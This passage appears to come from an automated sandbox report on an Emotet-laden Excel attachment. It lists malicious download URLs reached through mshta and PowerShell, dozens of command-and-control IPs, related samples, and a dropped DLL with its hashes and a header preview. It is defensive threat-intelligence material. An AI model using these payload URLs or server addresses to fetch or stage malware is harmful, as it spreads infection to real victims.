                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.666941334.0000000000350000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlYmshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlB2022-28-01_1202.xls.0.drtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlKmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              195.154.133.20
                              		unknownFrance
                              		12876OnlineSASFRtrue
                              185.157.82.211
                              		unknownPoland
                              		42927S-NET-ASPLtrue
                              212.237.17.99
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              79.172.212.216
                              		unknownHungary
                              		61998SZERVERPLEXHUtrue
                              110.232.117.186
                              		unknownAustralia
                              		56038RACKCORP-APRackCorpAUtrue
                              173.214.173.220
                              		unknownUnited States
                              		19318IS-AS-1UStrue
                              212.24.98.99
                              		unknownLithuania
                              		62282RACKRAYUABRakrejusLTtrue
                              138.185.72.26
                              		unknownBrazil
                              		264343EmpasoftLtdaMeBRtrue
                              178.63.25.185
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              160.16.102.168
                              		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                              81.0.236.90
                              		unknownCzech Republic
                              		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                              103.75.201.2
                              		unknownThailand
                              		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                              216.158.226.206
                              		unknownUnited States
                              		19318IS-AS-1UStrue
                              45.118.115.99
                              		unknownIndonesia
                              		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                              51.15.4.22
                              		unknownFrance
                              		12876OnlineSASFRtrue
                              159.89.230.105
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              162.214.50.39
                              		unknownUnited States
                              		46606UNIFIEDLAYER-AS-1UStrue
                              103.206.244.105
                              		jurnalpjf.lan.go.idIndonesia
                              		131111CEPATNET-AS-IDPTMoraTelematikaIndonesiaIDfalse
                              200.17.134.35
                              		unknownBrazil
                              		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                              217.182.143.207
                              		unknownFrance
                              		16276OVHFRtrue
                              107.182.225.142
                              		unknownUnited States
                              		32780HOSTINGSERVICES-INCUStrue
                              51.38.71.0
                              		unknownFrance
                              		16276OVHFRtrue
                              45.118.135.203
                              		unknownJapan63949LINODE-APLinodeLLCUStrue
                              50.116.54.215
                              		unknownUnited States
                              		63949LINODE-APLinodeLLCUStrue
                              131.100.24.231
                              		unknownBrazil
                              		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                              46.55.222.11
                              		unknownBulgaria
                              		34841BALCHIKNETBGtrue
                              41.76.108.46
                              		unknownSouth Africa
                              		327979DIAMATRIXZAtrue
                              173.212.193.249
                              		unknownGermany
                              		51167CONTABODEtrue
                              45.176.232.124
                              		unknownColombia
                              		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                              178.79.147.66
                              		unknownUnited Kingdom
                              		63949LINODE-APLinodeLLCUStrue
                              212.237.5.209
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              162.243.175.63
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              176.104.106.96
                              		unknownSerbia
                              		198371NINETRStrue
                              207.38.84.195
                              		unknownUnited States
                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                              164.68.99.3
                              		unknownGermany
                              		51167CONTABODEtrue
                              164.90.147.135
                              		hostfeeling.comUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              192.254.71.210
                              		unknownUnited States
                              		64235BIGBRAINUStrue
                              212.237.56.116
                              		unknownItaly
                              		31034ARUBA-ASNITtrue
                              104.168.155.129
                              		unknownUnited States
                              		54290HOSTWINDSUStrue
                              45.142.114.231
                              		unknownGermany
                              		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                              203.114.109.124
                              		unknownThailand
                              		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                              209.59.138.75
                              		unknownUnited States
                              		32244LIQUIDWEBUStrue
                              159.8.59.82
                              		unknownUnited States
                              		36351SOFTLAYERUStrue
                              129.232.188.93
                              		unknownSouth Africa
                              		37153xneeloZAtrue
                              91.240.118.172
                              		unknownunknown
                              		49453GLOBALLAYERNLtrue
                              58.227.42.236
                              		unknownKorea Republic of
                              		9318SKB-ASSKBroadbandCoLtdKRtrue
                              158.69.222.101
                              		unknownCanada
                              		16276OVHFRtrue
                              104.251.214.46
                              		unknownUnited States
                              		54540INCERO-HVVCUStrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:562524
                              Start date:29.01.2022
                              Start time:00:13:32
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 54s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:2022-28-01_1202.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@25/9@2/48
                              EGA Information:
                              • Successful, ratio: 80%
                              HDC Information:
                              • Successful, ratio: 25.8% (good quality ratio 21.6%)
                              • Quality average: 64.7%
                              • Quality standard deviation: 33.5%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 56
                              • Number of non-executed functions: 197
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xls
                              • Changed system and user locale, location and keyboard layout to English - United States
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 92.123.101.170, 92.123.101.179
                              • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                              • Execution Graph export aborted for target mshta.exe, PID 1928 because there are no executed function
                              • Execution Graph export aborted for target powershell.exe, PID 1160 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:14:18API Interceptor57x Sleep call for process: mshta.exe modified
                              00:14:22API Interceptor439x Sleep call for process: powershell.exe modified
                              00:15:00API Interceptor159x Sleep call for process: rundll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              195.154.133.202022-28-01_1203.xlsGet hashmaliciousBrowse
                                check.xlsGet hashmaliciousBrowse
                                  opastonline.com.xlsGet hashmaliciousBrowse
                                    G.dllGet hashmaliciousBrowse
                                      1162545482187818.xlsGet hashmaliciousBrowse
                                        364453688149503140239183.xlsGet hashmaliciousBrowse
                                          CJ68000754184.xlsGet hashmaliciousBrowse
                                            imedpub_2.xlsGet hashmaliciousBrowse
                                              imedpub_6.xlsGet hashmaliciousBrowse
                                                imedpub.com_6.xlsGet hashmaliciousBrowse
                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                        iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                          NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                            iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                              iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                      185.157.82.2112022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                        check.xlsGet hashmaliciousBrowse
                                                                          opastonline.com.xlsGet hashmaliciousBrowse
                                                                            G.dllGet hashmaliciousBrowse
                                                                              1162545482187818.xlsGet hashmaliciousBrowse
                                                                                364453688149503140239183.xlsGet hashmaliciousBrowse
                                                                                  CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                    imedpub_2.xlsGet hashmaliciousBrowse
                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                        imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                          imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                            iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                              iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                  NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                      iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                        iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                          iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                            iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                              212.237.17.992022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                check.xlsGet hashmaliciousBrowse
                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                    G.dllGet hashmaliciousBrowse
                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                        364453688149503140239183.xlsGet hashmaliciousBrowse
                                                                                                                          CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                            imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                              imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                        iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                          NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                                            iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                              iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                                iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      jurnalpjf.lan.go.id2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Opast International.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Insight Medical Publishing_1.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Insight Medical Publishing_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Insight Medical Publishing_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      Insight Medical Publishing.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      OMICS International.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      SecuriteInfo.com.X97M.DownLoader.901.32695.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      omicsonline.net.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.206.244.105
                                                                                                                                                      hostfeeling.com2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Opast International.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Insight Medical Publishing_1.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Insight Medical Publishing_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Insight Medical Publishing_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      Insight Medical Publishing.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      OMICS International.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      SecuriteInfo.com.X97M.DownLoader.901.32695.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135
                                                                                                                                                      omicsonline.net.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 164.90.147.135

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      S-NET-ASPL2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      check.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      G.dllGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      364453688149503140239183.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.157.82.211
                                                                                                                                                      ARUBA-ASNIT2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      check.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      G.dllGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      364453688149503140239183.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 212.237.56.116
                                                                                                                                                      OnlineSASFR2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      check.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      Bg6DyC7lDh.dllGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      G.dllGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      GULPPYUMBy.dllGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      1162545482187818.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      AcqQhfewOu.dllGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      364453688149503140239183.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      80_513972285.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      Attachment-2801.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      DOCUMENT_2801.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      DETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 195.154.146.35
                                                                                                                                                      imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)2022-28-01_1203.xlsGet hashmaliciousBrowse
                                                                                                                                                        C:\ProgramData\JooSee.dll2022-28-01_1203.xlsGet hashmaliciousBrowse

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\ProgramData\JooSee.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):548864
                                                                                                                                                          Entropy (8bit):6.980507701343226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvryMwWd3DYr6i64/:OUBPSczbeeTnvDZDWA
                                                                                                                                                          MD5:F8B4320DCDF37690102B2F93403BD32C
                                                                                                                                                          SHA1:E21CB5655B3094F322CDAEC4C0F359905F8A7949
                                                                                                                                                          SHA-256:21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                                                                                                                                                          SHA-512:13920D1CF9C9EF7329F402183AAFB8B9709A202326A67A141C9A0AA971DE8EECE9C94B47A9D7132A04B09289CD6F4824987E79ED7FDD97ECD26B8AB876E309C8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: 2022-28-01_1203.xls, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):11054
                                                                                                                                                          Entropy (8bit):6.200485074224619
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                                                          MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                                                          SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                                                          SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                                                          SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                                                          Malicious:false
                                                                                                                                                          IE Cache URL:http://91.240.118.172/gg/ff/fe.html
